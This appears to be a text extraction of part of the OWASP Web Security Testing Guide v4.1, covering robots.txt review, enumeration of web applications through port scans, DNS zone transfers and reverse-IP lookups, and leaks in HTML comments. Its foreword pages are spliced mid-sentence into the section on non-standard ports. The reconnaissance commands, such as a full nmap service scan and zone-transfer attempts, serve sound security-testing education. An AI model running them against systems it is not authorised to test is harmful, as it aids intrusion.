xml:lang="en" lang="en"></p><p><head></p><p><title>400 Bad Request</title></p><p></head></p><p><body></p><p><h1>400 Bad Request</h1></p><p></body></p><p></html></p><p>As default error pages offer many differentiating factors between types of web servers, their examination can be an</p><p>effective method for fingerprinting even when server header fields are obscured.</p><p>Using Automated Scanning Tools</p><p>Web Security Testing Guide v4.1</p><p>53</p><p>As stated earlier, web server fingerprinting is often included as a functionality of automated scanning tools. These tools</p><p>are able to make requests similar to those demonstrated above, as well as send other more server-specific probes.</p><p>Automated tools can compare responses from web servers much faster than manual testing, and utilize large</p><p>databases of known responses to attempt server identification. For these reasons, automated tools are more likely to</p><p>produce accurate results.</p><p>Here are some commonly-used scan tools that include web server fingerprinting functionality.</p><p>Netcraft, an online tool that scans websites for information, including the web server.</p><p>Nikto, an open source command line scanning tool.</p><p>Nmap, an open source command line tool that also has a GUI, Zenmap.</p><p>Remediation</p><p>While exposed server information is not necessarily in itself a vulnerability, it is information that can assist attackers in</p><p>exploiting other vulnerabilities that may exist. Exposed server information can also lead attackers to find version-</p><p>specific server vulnerabilities that can be used to exploit unpatched servers. For this reason it is recommended that</p><p>some precautions be taken. These actions include:</p><p>Obscuring web server information in headers, such as with Apache’s mod_headers module.</p><p>Using a hardened reverse proxy server to create an additional layer of security between the web server and the</p><p>Internet.</p><p>Ensuring that web servers are kept up-to-date with the latest software and security patches.</p><p>https://toolbar.netcraft.com/site_report</p><p>https://github.com/sullo/nikto</p><p>https://nmap.org/</p><p>https://nmap.org/zenmap/</p><p>https://httpd.apache.org/docs/current/mod/mod_headers.html</p><p>https://en.wikipedia.org/wiki/Proxy_server#Reverse_proxies</p><p>Web Security Testing Guide v4.1</p><p>54</p><p>Review Webserver Metafiles for Information Leakage</p><p>ID</p><p>WSTG-INFO-03</p><p>Summary</p><p>This section describes how to test the robots.txt file for information leakage of the web application’s directory or folder</p><p>path(s). Furthermore, the list of directories that are to be avoided by Spiders, Robots, or Crawlers can also be created</p><p>as a dependency for Map execution paths through application</p><p>Test Objectives</p><p>1. Information leakage of the web application’s directory or folder path(s).</p><p>2. Create the list of directories that are to be avoided by Spiders, Robots, or Crawlers.</p><p>How to Test</p><p>robots.txt</p><p>Web Spiders, Robots, or Crawlers retrieve a web page and then recursively traverse hyperlinks to retrieve further web</p><p>content. Their accepted behavior is specified by the Robots Exclusion Protocol of the robots.txt file in the web root</p><p>directory.</p><p>As an example, the beginning of the robots.txt file from https://www.google.com/robots.txt sampled on 11 August 2013 is</p><p>quoted below:</p><p>User-agent: *</p><p>Disallow: /search</p><p>Disallow: /sdch</p><p>Disallow: /groups</p><p>Disallow: /images</p><p>Disallow: /catalogs</p><p>...</p><p>The User-Agent directive refers to the specific web spider/robot/crawler. For example the User-Agent: Googlebot refers</p><p>to the spider from Google while “User-Agent: bingbot” refers to crawler from Microsoft/Yahoo!. User-Agent: * in the</p><p>example above applies to all web spiders/robots/crawlers as quoted below:</p><p>User-agent: *</p><p>The Disallow directive specifies which resources are prohibited by spiders/robots/crawlers. In the example above,</p><p>directories such as the following are prohibited:</p><p>...</p><p>Disallow: /search</p><p>Disallow: /sdch</p><p>Disallow: /groups</p><p>Disallow: /images</p><p>Disallow: /catalogs</p><p>...</p><p>Web spiders/robots/crawlers can intentionally ignore the Disallow directives specified in a robots.txt file, such as</p><p>those from Social Networks to ensure that shared linked are still valid. Hence, robots.txt should not be considered as a</p><p>https://www.robotstxt.org/</p><p>https://www.robotstxt.org/</p><p>https://www.google.com/robots.txt</p><p>https://support.google.com/webmasters/answer/6062608?visit_id=637173940975499736-3548411022&rd=1</p><p>https://blog.isc2.org/isc2_blog/2008/07/the-attack-of-t.html</p><p>https://www.htbridge.com/news/social_networks_can_robots_violate_user_privacy.html</p><p>Web Security Testing Guide v4.1</p><p>55</p><p>mechanism to enforce restrictions on how web content is accessed, stored, or republished by third parties.</p><p>robots.txt in Webroot - with `Wget` or `Curl`</p><p>The robots.txt file is retrieved from the web root directory of the web server. For example, to retrieve the robots.txt from</p><p>www.google.com using wget or curl :</p><p>$ wget http://www.google.com/robots.txt</p><p>--2013-08-11 14:40:36-- http://www.google.com/robots.txt</p><p>Resolving www.google.com... 74.125.237.17, 74.125.237.18, 74.125.237.19, ...</p><p>Connecting to www.google.com|74.125.237.17|:80... connected.</p><p>HTTP request sent, awaiting response... 200 OK</p><p>Length: unspecified [text/plain]</p><p>Saving to: ‘robots.txt.1’</p><p>[ <=> ] 7,074 --.-K/s in 0s</p><p>2013-08-11 14:40:37 (59.7 MB/s) - ‘robots.txt’ saved [7074]</p><p>$ head -n5 robots.txt</p><p>User-agent: *</p><p>Disallow: /search</p><p>Disallow: /sdch</p><p>Disallow: /groups</p><p>Disallow: /images</p><p>$</p><p>$ curl -O http://www.google.com/robots.txt</p><p>% Total % Received % Xferd Average Speed Time Time Time Current</p><p>Dload Upload Total Spent Left Speed</p><p>101 7074 0 7074 0 0 9410 0 --:--:-- --:--:-- --:--:-- 27312</p><p>$ head</p><p>-n5 robots.txt</p><p>User-agent: *</p><p>Disallow: /search</p><p>Disallow: /sdch</p><p>Disallow: /groups</p><p>Disallow: /images</p><p>$</p><p>robots.txt in Webroot - with Rockspider</p><p>rockspider automates the creation of the initial scope for Spiders/Robots/Crawlers of files and directories/folders of a</p><p>web site.</p><p>For example, to create the initial scope based on the Allowed : directive from www.google.com using rockspider:</p><p>$ ./rockspider.pl -www www.google.com</p><p>"Rockspider" Alpha v0.1_2</p><p>Copyright 2013 Christian Heinrich</p><p>Licensed under the Apache License, Version 2.0</p><p>1. Downloading http://www.google.com/robots.txt</p><p>2. "robots.txt" saved as "www.google.com-robots.txt"</p><p>3. Sending Allow: URIs of www.google.com to web proxy i.e. 127.0.0.1:8080</p><p>/catalogs/about sent</p><p>/catalogs/p? sent</p><p>/news/directory sent</p><p>...</p><p>4. Done.</p><p>$</p><p>https://github.com/cmlh/rockspider/</p><p>https://www.smh.com.au/technology/telstra-customer-database-exposed-20111209-1on60.html</p><p>Web Security Testing Guide v4.1</p><p>56</p><p>Analyze robots.txt Using Google Webmaster Tools</p><p>Web site owners can use the Google “Analyze robots.txt” function to analyse the website as part of its Google</p><p>Webmaster Tools. This tool can assist with testing and the procedure is as follows:</p><p>1. Sign into Google Webmaster Tools with a Google account.</p><p>2. On the dashboard, write the URL for the site to be analyzed.</p><p>3. Choose between the available methods and follow the on screen instruction.</p><p>META Tag</p><p><META> tags are located within the HEAD section of each HTML Document and should be consistent across a web site</p><p>in the likely event that the robot/spider/crawler start point does not begin from a document link other than webroot i.e. a</p><p>deep link.</p><p>If there is no <META NAME="ROBOTS" ... > entry then the “Robots Exclusion Protocol” defaults to INDEX,FOLLOW</p><p>respectively. Therefore, the other two valid entries defined by the “Robots Exclusion Protocol” are prefixed with NO...</p><p>i.e. NOINDEX and NOFOLLOW .</p><p>Web spiders/robots/crawlers can intentionally ignore the <META NAME="ROBOTS" tag as the robots.txt file convention is</p><p>preferred. Hence, Tags should not be considered the primary mechanism, rather a complementary control to</p><p>robots.txt.</p><p>META Tags - with Burp</p><p>Based on the Disallow directive(s) listed within the robots.txt file in webroot, a regular expression search for <META</p><p>NAME="ROBOTS" within each web page is undertaken and the result compared to the robots.txt file in webroot.</p><p>For example, the robots.txt file from facebook.com has a Disallow: /ac.php entry http://facebook.com/robots.txt and</p><p>the resulting search for <META NAME="ROBOTS" shown below:</p><p>Figure 4.1.3-1: Facebook Meta Tag Example</p><p>The above might be considered a fail since INDEX,FOLLOW is the default <META> Tag specified by the “Robots</p><p>Exclusion Protocol” yet Disallow: /ac.php is listed in robots.txt.</p><p>Tools</p><p>Browser (View Source function)</p><p>https://www.google.com/webmasters/tools</p><p>https://en.wikipedia.org/wiki/Deep_linking</p><p>http://facebook.com/robots.txt</p><p>Web Security Testing Guide v4.1</p><p>57</p><p>curl</p><p>wget</p><p>rockspider</p><p>https://github.com/cmlh/rockspider</p><p>Web Security Testing Guide v4.1</p><p>58</p><p>Enumerate Applications on Webserver</p><p>ID</p><p>WSTG-INFO-04</p><p>Summary</p><p>A paramount step in testing for web application vulnerabilities is to find out which particular applications are hosted on</p><p>a web server. Many applications have known vulnerabilities and known attack strategies that can be exploited in order</p><p>to gain remote control or to exploit data. In addition, many applications are often misconfigured or not updated, due to</p><p>the perception that they are only used “internally” and therefore no threat exists. With the proliferation of virtual web</p><p>servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original</p><p>significance. It is not uncommon to have multiple web sites or applications whose symbolic names resolve to the same</p><p>IP address. This scenario is not limited to hosting environments, but also applies to ordinary corporate environments as</p><p>well.</p><p>Security professionals are sometimes given a set of IP addresses as a target to test. It is arguable that this scenario is</p><p>more akin to a penetration test-type engagement, but in any case it is expected that such an assignment would test all</p><p>web applications accessible through this target. The problem is that the given IP address hosts an HTTP service on port</p><p>80, but if a tester should access it by specifying the IP address (which is all they know) it reports “No web server</p><p>configured at this address” or a similar message. But that system could “hide” a number of web applications, associated</p><p>to unrelated symbolic (DNS) names. Obviously, the extent of the analysis is deeply affected by the tester tests all</p><p>applications or only tests the applications that they are aware of.</p><p>Sometimes, the target specification is richer. The tester may be given a list of IP addresses and their corresponding</p><p>symbolic names. Nevertheless, this list might convey partial information, i.e., it could omit some symbolic names and</p><p>the client may not even being aware of that (this is more likely to happen in large organizations).</p><p>Other issues affecting the scope of the assessment are represented by web applications published at non-obvious</p><p>URLs (e.g., http://www.example.com/some-strange-URL ), which are not referenced elsewhere. This may happen</p><p>either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).</p><p>To address these issues, it is necessary to perform web application discovery.</p><p>Test Objectives</p><p>Enumerate the applications within scope that exist on a web server</p><p>How to Test</p><p>Black-Box Testing</p><p>Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is</p><p>usually specified as a set of IP addresses (maybe a net block), but may consist of a set of DNS symbolic names or a mix</p><p>of the two. This information is handed out prior to the execution of an assessment, be it a classic-style penetration test</p><p>or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., test only</p><p>the application located at the URL http://www.example.com/ ), the assessment should strive to be the most</p><p>comprehensive in scope, i.e. it should identify all the applications accessible through the given target. The following</p><p>examples examine a few techniques that can be employed to achieve this goal.</p><p>Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based</p><p>search services and the use of search engines. Examples make use of private IP addresses (such as</p><p>192.168.1.100 ), which, unless indicated otherwise, represent generic IP addresses and are used only for</p><p>anonymity purposes.</p><p>Web Security Testing Guide v4.1</p><p>59</p><p>There are three factors influencing how many applications are related to a given DNS name (or an IP address):</p><p>1. Different Base URL</p><p>The obvious entry point for a web application is www.example.com , i.e., with this shorthand notation we think of the</p><p>web application originating at http://www.example.com/ (the same applies for https). However, even though this</p><p>is the most common situation, there is nothing forcing the application to start at / .</p><p>For example, the same symbolic name may be associated to three web applications such as:</p><p>http://www.example.com/url1 http://www.example.com/url2 http://www.example.com/url3</p><p>In this case, the URL http://www.example.com/ would not be associated with a meaningful page, and the three</p><p>applications would be hidden, unless the tester explicitly knows how to reach them, i.e., the tester knows url1, url2</p><p>or url3. There is usually no need to publish web applications in this way, unless the owner doesn’t want them to be</p><p>accessible in a standard way, and is prepared to inform the users about their exact location. This doesn’t mean that</p><p>these applications are secret, just that their existence and location is not explicitly advertised.</p><p>2. Non-standard</p><p>and maintaining secure applications. This Testing Guide will show</p><p>you how to verify the security of your running application. I highly recommend using these guides as part of your</p><p>application security initiatives.</p><p>Why OWASP?</p><p>Creating a guide like this is a huge undertaking, requiring the expertise of hundreds of people around the world. There</p><p>are many different ways to test for security flaws and this guide captures the consensus of the leading experts on how</p><p>to perform this testing quickly, accurately, and efficiently. OWASP gives like minded security folks the ability to work</p><p>together and form a leading practice approach to a security problem.</p><p>The importance of having this guide available in a completely free and open way is important for the foundations</p><p>mission. It gives anyone the ability to understand the techniques used to test for common security issues. Security</p><p>should not be a black art or closed secret that only a few can practice. It should be open to all and not exclusive to</p><p>security practitioners but also QA, Developers and Technical Managers. The project to build this guide keeps this</p><p>expertise in the hands of the people who need it - you, me and anyone that is involved in building software.</p><p>This guide must make its way into the hands of developers and software testers. There are not nearly enough</p><p>application security experts in the world to make any significant dent in the overall problem. The initial responsibility for</p><p>application security must fall on the shoulders of the developers, they write the code. It shouldn’t be a surprise that</p><p>developers aren’t producing secure code if they’re not testing for it or consider the types of bugs which introduce</p><p>vulnerability.</p><p>Keeping this information up to date is a critical aspect of this guide project. By adopting the wiki approach, the OWASP</p><p>community can evolve and expand the information in this guide to keep pace with the fast moving application security</p><p>threat landscape.</p><p>This Guide is a great testament to the passion and energy our members and project volunteers have for this subject. It</p><p>shall certainly help change the world a line of code at a time.</p><p>https://www.zaproxy.org/</p><p>Web Security Testing Guide v4.1</p><p>6</p><p>Tailoring and Prioritizing</p><p>You should adopt this guide in your organization. You may need to tailor the information to match your organization’s</p><p>technologies, processes, and organizational structure.</p><p>In general there are several different roles within organizations that may use this guide:</p><p>Developers should use this guide to ensure that they are producing secure code. These tests should be a part of</p><p>normal code and unit testing procedures.</p><p>Software testers and QA should use this guide to expand the set of test cases they apply to applications. Catching</p><p>these vulnerabilities early saves considerable time and effort later.</p><p>Security specialists should use this guide in combination with other techniques as one way to verify that no security</p><p>holes have been missed in an application.</p><p>Project Managers should consider the reason this guide exists and that security issues are manifested via bugs in</p><p>code and design.</p><p>The most important thing to remember when performing security testing is to continuously re-prioritize. There are an</p><p>infinite number of possible ways that an application could fail, and organizations always have limited testing time and</p><p>resources. Be sure time and resources are spent wisely. Try to focus on the security holes that are a real risk to your</p><p>business. Try to contextualize risk in terms of the application and its use cases.</p><p>This guide is best viewed as a set of techniques that you can use to find different types of security holes. But not all the</p><p>techniques are equally important. Try to avoid using the guide as a checklist, new vulnerabilities are always</p><p>manifesting and no guide can be an exhaustive list of “things to test for”, but rather a great place to start.</p><p>The Role of Automated Tools</p><p>There are a number of companies selling automated security analysis and testing tools. Remember the limitations of</p><p>these tools so that you can use them for what they’re good at. As Michael Howard put it at the 2006 OWASP AppSec</p><p>Conference in Seattle, “Tools do not make software secure! They help scale the process and help enforce policy.”</p><p>Most importantly, these tools are generic - meaning that they are not designed for your custom code, but for</p><p>applications in general. That means that while they can find some generic problems, they do not have enough</p><p>knowledge of your application to allow them to detect most flaws. In my experience, the most serious security issues</p><p>are the ones that are not generic, but deeply intertwined in your business logic and custom application design.</p><p>These tools can also be seductive, since they do find lots of potential issues. While running the tools doesn’t take much</p><p>time, each one of the potential problems takes time to investigate and verify. If the goal is to find and eliminate the most</p><p>serious flaws as quickly as possible, consider whether your time is best spent with automated tools or with the</p><p>techniques described in this guide. Still, these tools are certainly part of a well-balanced application security program.</p><p>Used wisely, they can support your overall processes to produce more secure code.</p><p>Call to Action</p><p>If you’re building, designing or testing software, I strongly encourage you to get familiar with the security testing</p><p>guidance in this document. It is a great road map for testing the most common issues facing applications today, but it is</p><p>not exhaustive. If you find errors, please add a note to the discussion page or make the change yourself. You’ll be</p><p>helping thousands of others who use this guide.</p><p>Please consider joining us as an individual or corporate member so that we can continue to produce materials like this</p><p>testing guide and all the other great projects at OWASP.</p><p>Thank you to all the past and future contributors to this guide, your work will help to make applications worldwide more</p><p>secure.</p><p>–Eoin Keary, OWASP Board Member, April 19, 2013</p><p>https://owasp.org/membership/</p><p>Web Security Testing Guide v4.1</p><p>7</p><p>Frontispiece</p><p>Welcome</p><p>Open and collaborative knowledge: that is the OWASP way.</p><p>With V4 we realized a new guide that will be the standard de-facto guide to perform Web Application Penetration</p><p>Testing.</p><p>— Matteo Meucci</p><p>OWASP thanks the many authors, reviewers, and editors for their hard work in bringing this guide to where it is today. If</p><p>you have any comments or suggestions on the Testing Guide, please feel free to open an Issue or submit a</p><p>fix/contribution via Pull Request to our GitHub repo.</p><p>Version 4.1</p><p>This minor release represents a transitional step between the 2014 release of v4 via the OWASP wiki, and the</p><p>preparation of v5, currently underway on GitHub.</p><p>Copyright and Licensee</p><p>Copyright (c) 2020 The OWASP Foundation.</p><p>This document is released under the Creative Commons 4.0 License. Please read and understand the license and</p><p>copyright conditions.</p><p>Leaders</p><p>Elie Saad</p><p>Matteo Meucci</p><p>Rick Mitchell</p><p>Core Team</p><p>Rejah Rehim</p><p>Victoria Drake</p><p>Authors</p><p>Elie Saad</p><p>Janos Zold</p><p>Jeremy Bonghwan Choi</p><p>Joel Espunya</p><p>Manh Pham Tien</p><p>Mark Clayton</p><p>Rick Mitchell</p><p>Rubal Jain</p><p>Tal Argoni</p><p>Victoria Drake</p><p>Graphic Designers</p><p>Hugo Costa</p><p>https://github.com/OWASP/wstg/</p><p>https://creativecommons.org/licenses/by-sa/4.0/</p><p>Web Security Testing Guide v4.1</p><p>8</p><p>Jishnu Vijayan C K</p><p>Muhammed Anees</p><p>Reviewers or Editors</p><p>Asharaf Ali</p><p>Elie Saad</p><p>Jeremy Bonghwan Choi</p><p>Lukasz Lubczynski</p><p>Patrick Santos</p><p>Rejah Rehim</p><p>Rick Mitchell</p><p>Roman Mueller</p><p>Tom Bowyer</p><p>Victoria Drake</p><p>Trademarks</p><p>Java, Java Web Server, and JSP are registered trademarks of Sun Microsystems, Inc.</p><p>Merriam-Webster is a trademark of Merriam-Webster, Inc.</p><p>Microsoft is a registered trademark of Microsoft Corporation.</p><p>Octave is a service mark of Carnegie Mellon University.</p><p>OWASP is a registered trademark of the OWASP Foundation</p><p>VeriSign and Thawte are registered trademarks of VeriSign, Inc.</p><p>Visa is a registered trademark of VISA USA.</p><p>All other products</p><p>Ports</p><p>While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port</p><p>numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by</p><p>specifying the port number as follows: http\[s\]://www.example.com:port/ . For example,</p><p>http://www.example.com:20000/ .</p><p>3. Virtual Hosts</p><p>DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address</p><p>192.168.1.100 might be associated to DNS names www.example.com , helpdesk.example.com ,</p><p>webmail.example.com . It is not necessary that all the names belong to the same DNS domain. This 1-to-N</p><p>relationship may be reflected to serve different content by using so called virtual hosts. The information specifying</p><p>the virtual host we are referring to is embedded in the HTTP 1.1 Host header.</p><p>One would not suspect the existence of other web applications in addition to the obvious www.example.com ,</p><p>unless they know of helpdesk.example.com and webmail.example.com .</p><p>Approaches to Address Issue 1 - Non-standard URLs</p><p>There is no way to fully ascertain the existence of non-standard-named web applications. Being non-standard, there is</p><p>no fixed criteria governing the naming convention, however there are a number of techniques that the tester can use to</p><p>gain some additional insight.</p><p>First, if the web server is mis-configured and allows directory browsing, it may be possible to spot these applications.</p><p>Vulnerability scanners may help in this respect.</p><p>Second, these applications may be referenced by other web pages and there is a chance that they have been spidered</p><p>and indexed by web search engines. If testers suspect the existence of such hidden applications on www.example.com</p><p>they could search using the site operator and examining the result of a query for site: www.example.com . Among the</p><p>returned URLs there could be one pointing to such a non-obvious application.</p><p>Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a</p><p>web mail front end might be accessible from URLs such as https://www.example.com/webmail ,</p><p>https://webmail.example.com/ , or https://mail.example.com/ . The same holds for administrative interfaces, which</p><p>may be published at hidden URLs (for example, a Tomcat administrative interface), and yet not referenced anywhere.</p><p>So doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners</p><p>may help in this respect.</p><p>Approaches to Address Issue 2 - Non-standard Ports</p><p>https://tools.ietf.org/html/rfc2616#section-14.23</p><p>Web Security Testing Guide v4.1</p><p>60</p><p>It is easy to check for the existence of web applications on non-standard ports. A port scanner such as nmap is capable</p><p>of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What</p><p>is required is a full scan of the whole 64k TCP port address space.</p><p>For example, the following command will look up, with a TCP connect scan, all open ports on IP 192.168.1.100 and</p><p>will try to determine what services are bound to them (only essential switches are shown – nmap features a broad set of</p><p>options, whose discussion is out of scope):</p><p>nmap –PN –sT –sV –p0-65535 192.168.1.100</p><p>It is sufficient to examine the output and look for http or the indication of SSL-wrapped services (which should be</p><p>probed to confirm that they are https). For example, the output of the previous command could look like:</p><p>Interesting ports on 192.168.1.100:</p><p>(The 65527 ports scanned but not shown below are in state: closed)</p><p>PORT STATE SERVICE VERSION</p><p>22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99)</p><p>80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux))</p><p>443/tcp open ssl OpenSSL</p><p>901/tcp open http Samba SWAT administration server</p><p>1241/tcp open ssl Nessus security scanner</p><p>3690/tcp open unknown</p><p>8000/tcp open http-alt?</p><p>8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1</p><p>From this example, one see that:</p><p>There is an Apache HTTP server running on port 80.</p><p>It looks like there is an HTTPS server on port 443 (but this needs to be confirmed, for example, by visiting</p><p>https://192.168.1.100 with a browser).</p><p>On port 901 there is a Samba SWAT web interface.</p><p>The service on port 1241 is not HTTPS, but is the SSL-wrapped Nessus daemon.</p><p>Port 3690 features an unspecified service (nmap gives back its fingerprint - here omitted for clarity - together with</p><p>instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it</p><p>represents).</p><p>Another unspecified service on port 8000; this might possibly be HTTP, since it is not uncommon to find HTTP</p><p>servers on this port. Let’s examine this issue:</p><p>$ telnet 192.168.10.100 8000</p><p>Trying 192.168.1.100...</p><p>Connected to 192.168.1.100.</p><p>Escape character is '^]'.</p><p>GET / HTTP/1.0</p><p>HTTP/1.0 200 OK</p><p>pragma: no-cache</p><p>Content-Type: text/html</p><p>Server: MX4J-HTTPD/1.0</p><p>expires: now</p><p>Cache-Control: no-cache</p><p><html></p><p>...</p><p>This confirms that in fact it is an HTTP server. Alternatively, testers could have visited the URL with a web browser; or</p><p>used the GET or HEAD Perl commands, which mimic HTTP interactions such as the one given above (however HEAD</p><p>requests may not be honored by all servers).</p><p>Web Security Testing Guide v4.1</p><p>61</p><p>Apache Tomcat running on port 8080.</p><p>The same task may be performed by vulnerability scanners, but first check that the scanner of choice is able to identify</p><p>HTTP[S] services running on non-standard ports. For example, Nessus is capable of identifying them on arbitrary ports</p><p>(provided it is instructed to scan all the ports), and will provide, with respect to nmap, a number of tests on known web</p><p>server vulnerabilities, as well as on the SSL configuration of HTTPS services. As hinted before, Nessus is also able to</p><p>spot popular applications or web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative</p><p>interface).</p><p>Approaches to Address Issue 3 - Virtual Hosts</p><p>There are a number of techniques which may be used to identify DNS names associated to a given IP address</p><p>x.y.z.t .</p><p>DNS Zone Transfers</p><p>This technique has limited use nowadays, given the fact that zone transfers are largely not honored by DNS servers.</p><p>However, it may be worth a try. First of all, testers must determine the name servers serving x.y.z.t . If a symbolic</p><p>name is known for x.y.z.t (let it be www.example.com ), its name servers can be determined by means of tools such</p><p>as nslookup , host , or dig , by requesting DNS NS records.</p><p>If no symbolic names are known for x.y.z.t , but the target definition contains at least a symbolic name, testers may</p><p>try to apply the same process and query the name server of that name (hoping that x.y.z.t will be served as well by</p><p>that name server). For example, if the target consists of the IP address x.y.z.t and the name mail.example.com ,</p><p>determine the name servers for domain example.com .</p><p>The following example shows how to identify the name servers for www.owasp.org by using the host command:</p><p>$ host -t ns www.owasp.org</p><p>www.owasp.org is an alias for owasp.org.</p><p>owasp.org name server ns1.secure.net.</p><p>owasp.org name server ns2.secure.net.</p><p>A zone transfer may now be requested to the name servers for domain example.com . If the tester is lucky, they will get</p><p>back a list of the DNS entries for this domain. This will include the obvious www.example.com and the not-so-obvious</p><p>helpdesk.example.com and webmail.example.com (and possibly others). Check all names returned by the zone</p><p>transfer and consider all of those which are related to the target being evaluated.</p><p>Trying to request a zone transfer for owasp.org from one of its name servers:</p><p>$ host -l www.owasp.org ns1.secure.net</p><p>Using domain server:</p><p>Name: ns1.secure.net</p><p>Address: 192.220.124.10#53</p><p>Aliases:</p><p>Host www.owasp.org not found: 5(REFUSED)</p><p>; Transfer failed.</p><p>DNS Inverse Queries</p><p>This process</p><p>is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone</p><p>transfer, try setting the record type to PTR and issue a query on the given IP address. If the testers are lucky, they may</p><p>get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not</p><p>guaranteed.</p><p>Web-based DNS Searches</p><p>Web Security Testing Guide v4.1</p><p>62</p><p>This kind of search is akin to DNS zone transfer, but relies on web-based services that enable name-based searches</p><p>on DNS. One such service is the Netcraft Search DNS service. The tester may query for a list of names belonging to</p><p>your domain of choice, such as example.com . Then they will check whether the names they obtained are pertinent to</p><p>the target they are examining.</p><p>Reverse-IP Services</p><p>Reverse-IP services are similar to DNS inverse queries, with the difference that the testers query a web-based</p><p>application instead of a name server. There are a number of such services available. Since they tend to return partial</p><p>(and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.</p><p>Domain Tools Reverse IP (requires free membership)</p><p>Bing, syntax: ip:x.x.x.x</p><p>Webhosting Info, syntax: http://whois.webhosting.info/x.x.x.x</p><p>DNSstuff (multiple services available)</p><p>Net Square (multiple queries on domains and IP addresses, requires installation)</p><p>The following example shows the result of a query to one of the above reverse-IP services to 216.48.3.18 , the IP</p><p>address of www.owasp.org. Three additional non-obvious symbolic names mapping to the same address have been</p><p>revealed.</p><p>Figure 4.1.4-1: OWASP Whois Info</p><p>Googling</p><p>Following information gathering from the previous techniques, testers can rely on search engines to possibly refine and</p><p>increment their analysis. This may yield evidence of additional symbolic names belonging to the target, or applications</p><p>accessible via non-obvious URLs.</p><p>For instance, considering the previous example regarding www.owasp.org , the tester could query Google and other</p><p>search engines looking for information (hence, DNS names) related to the newly discovered domains of webgoat.org ,</p><p>webscarab.com , and webscarab.net .</p><p>Googling techniques are explained in Testing: Spiders, Robots, and Crawlers.</p><p>Gray-Box Testing</p><p>Not applicable. The methodology remains the same as listed in black-box testing no matter how much information the</p><p>tester starts with.</p><p>Tools</p><p>https://searchdns.netcraft.com/?host</p><p>https://www.domaintools.com/reverse-ip/</p><p>https://bing.com/</p><p>http://whois.webhosting.info/</p><p>https://www.dnsstuff.com/</p><p>https://web.archive.org/web/20190515092354/http://www.net-square.com/mspawn.html</p><p>http://www.owasp.org/</p><p>Web Security Testing Guide v4.1</p><p>63</p><p>DNS lookup tools such as nslookup , dig and similar.</p><p>Search engines (Google, Bing and other major search engines).</p><p>Specialized DNS-related web-based search service: see text.</p><p>Nmap</p><p>Nessus Vulnerability Scanner</p><p>Nikto</p><p>https://nmap.org/</p><p>https://www.tenable.com/products/nessus</p><p>https://www.cirt.net/nikto2</p><p>Web Security Testing Guide v4.1</p><p>64</p><p>Review Webpage Comments and Metadata for Information</p><p>Leakage</p><p>ID</p><p>WSTG-INFO-05</p><p>Summary</p><p>It is very common, and even recommended, for programmers to include detailed comments and metadata on their</p><p>source code. However, comments and metadata included into the HTML code might reveal internal information that</p><p>should not be available to potential attackers. Comments and metadata review should be done in order to determine if</p><p>any information is being leaked.</p><p>Test Objectives</p><p>Review webpage comments and metadata to better understand the application and to find any information leakage.</p><p>How to Test</p><p>HTML comments are often used by the developers to include debugging information about the application. Sometimes</p><p>they forget about the comments and they leave them on in production. Testers should look for HTML comments which</p><p>start with “ “.</p><p>Black-Box Testing</p><p>Check HTML source code for comments containing sensitive information that can help the attacker gain more insight</p><p>about the application. It might be SQL code, usernames and passwords, internal IP addresses, or debugging</p><p>information.</p><p>...</p><p><div class="table2"></p><p><div class="col1">1</div><div class="col2">Mary</div></p><p><div class="col1">2</div><div class="col2">Peter</div></p><p><div class="col1">3</div><div class="col2">Joe</div></p><p><!-- Query: SELECT id, name FROM app.users WHERE active='1' --></p><p></div></p><p>...</p><p>The tester may even find something like this:</p><p><!-- Use the DB administrator password for testing: f@keP@a$$w0rD --></p><p>Check HTML version information for valid version numbers and Data Type Definition (DTD) URLs</p><p><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"></p><p>strict.dtd – default strict DTD</p><p>loose.dtd – loose DTD</p><p>Web Security Testing Guide v4.1</p><p>65</p><p>frameset.dtd – DTD for frameset documents</p><p>Some Meta tags do not provide active attack vectors but instead allow an attacker to profile an application to</p><p><META name="Author" content="Andrew Muller"></p><p>A common (but not WCAG compliant) Meta tag is the refresh.</p><p><META http-equiv="Refresh" content="15;URL=https://www.owasp.org/index.html"></p><p>A common use for Meta tag is to specify keywords that a search engine may use to improve the quality of search</p><p>results.</p><p><META name="keywords" lang="en-us" content="OWASP, security, sunshine, lollipops"></p><p>Although most web servers manage search engine indexing via the robots.txt file, it can also be managed by Meta tags.</p><p>The tag below will advise robots to not index and not follow links on the HTML page containing the tag.</p><p><META name="robots" content="none">` `</p><p>The Platform for Internet Content Selection (PICS) and Protocol for Web Description Resources (POWDER) provide</p><p>infrastructure for associating meta data with Internet content.</p><p>Gray-Box Testing</p><p>Not applicable.</p><p>Tools</p><p>Wget</p><p>Browser “view source” function</p><p>Eyeballs</p><p>Curl</p><p>References</p><p>Whitepapers</p><p>HTML version 4.01</p><p>XHTML</p><p>HTML version 5</p><p>https://www.gnu.org/software/wget/wget.html</p><p>https://curl.haxx.se/</p><p>https://www.w3.org/TR/1999/REC-html401-19991224</p><p>https://www.w3.org/TR/2010/REC-xhtml-basic-20101123/</p><p>https://www.w3.org/TR/html5/</p><p>Web Security Testing Guide v4.1</p><p>66</p><p>Identify Application Entry Points</p><p>ID</p><p>WSTG-INFO-06</p><p>Summary</p><p>Enumerating the application and its attack surface is a key precursor before any thorough testing can be undertaken,</p><p>as it allows the tester to identify likely areas of weakness. This section aims to help identify and map out areas within</p><p>the application that should be investigated once enumeration and mapping have been completed.</p><p>Test Objectives</p><p>Understand how requests are formed and typical responses from the 